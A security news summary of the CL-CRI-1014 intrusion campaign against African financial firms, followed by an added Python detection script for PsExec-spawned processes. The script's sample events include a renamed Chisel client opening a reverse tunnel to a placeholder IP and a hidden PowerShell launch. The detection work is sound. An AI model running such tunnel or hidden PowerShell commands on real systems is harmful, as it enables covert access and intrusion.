The CL-CRI-1014 threat operation has spent the past two years using open-source tools to infiltrate financial organizations across Africa, Infosecurity Magazine reports.
As part of its most recent campaign, CL-CRI-1014 leveraged PsExec to establish connections with another machine, which it then injected with the Chisel tunneling utility to circumvent firewall defenses and facilitate further machine compromise, according to an analysis from Palo Alto Networks Unit 42 researchers. Attackers then used PsExec to either deploy the PoshC2 attack framework for reconnaissance or run PowerShell to install the Classroom Spy remote administration tool, which superseded the MeshAgent tool used in previous attacks. With Classroom Spy, CL-CRI-1014 was able to perform not only live computer screen monitoring, webpage logging, keylogging, audio recording, and file exfiltration, but also system data gathering, terminal opening, and app tracking and blocking, said researchers, who also noted the attackers' subsequent use of packers and other techniques to bypass detection.
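The chain described above (PsExec session on the target, then a Chisel client or a PowerShell installer launched from it) is visible in process-creation telemetry because PsExec runs its remote service as PSEXESVC.exe. The following detection logic is an added example, not code from Unit 42 or Infosecurity Magazine; it assumes Sysmon-style process-creation records normalised into dicts, uses constructed sample events, and treats the Chisel client command-line shape as an assumption about what a renamed binary still looks like.

```python
import re
from typing import Iterable, Optional

# PsExec runs its remote service as PSEXESVC.exe on the target, so anything
# spawned by that image was launched through the PsExec session.
PSEXEC_SERVICE = "psexesvc.exe"
# Chisel's client form is "chisel client <server> R:<remote spec>"; the R:
# prefix requests a reverse tunnel. Matching on it is an assumption that a
# renamed binary keeps this command-line shape.
CHISEL_CLIENT_RE = re.compile(r"\bclient\s+\S+\s+R:", re.IGNORECASE)
POWERSHELL_NAMES = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Label one process-creation event, or return None if it is not PsExec-spawned."""
    if basename(event.get("ParentImage", "")) != PSEXEC_SERVICE:
        return None
    if CHISEL_CLIENT_RE.search(event.get("CommandLine", "")):
        return "psexec_spawned_reverse_tunnel_client"
    if basename(event.get("Image", "")) in POWERSHELL_NAMES:
        return "psexec_spawned_powershell"
    return "psexec_spawned_process"


def scan(events: Iterable[dict]) -> list:
    """Return (host, label) pairs for every PsExec-spawned process."""
    return [(ev["Computer"], classify(ev)) for ev in events if classify(ev)]


# Constructed sample events in Sysmon field names; not telemetry from the campaign.
SAMPLE_EVENTS = [
    {"Computer": "fin-ws-01", "ParentImage": r"C:\Windows\PSEXESVC.exe",
     "Image": r"C:\Users\Public\svc.exe",
     "CommandLine": "svc.exe client 198.51.100.7:8080 R:socks"},
    {"Computer": "fin-ws-02", "ParentImage": r"C:\Windows\PSEXESVC.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -File C:\\Temp\\setup.ps1"},
    {"Computer": "fin-ws-03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for host, label in scan(SAMPLE_EVENTS):
        print(host, label)
```

Legitimate administrators also use PsExec, so the generic `psexec_spawned_process` label is a triage signal rather than an alert on its own; the tunnel-client and PowerShell children are the ones worth paging on.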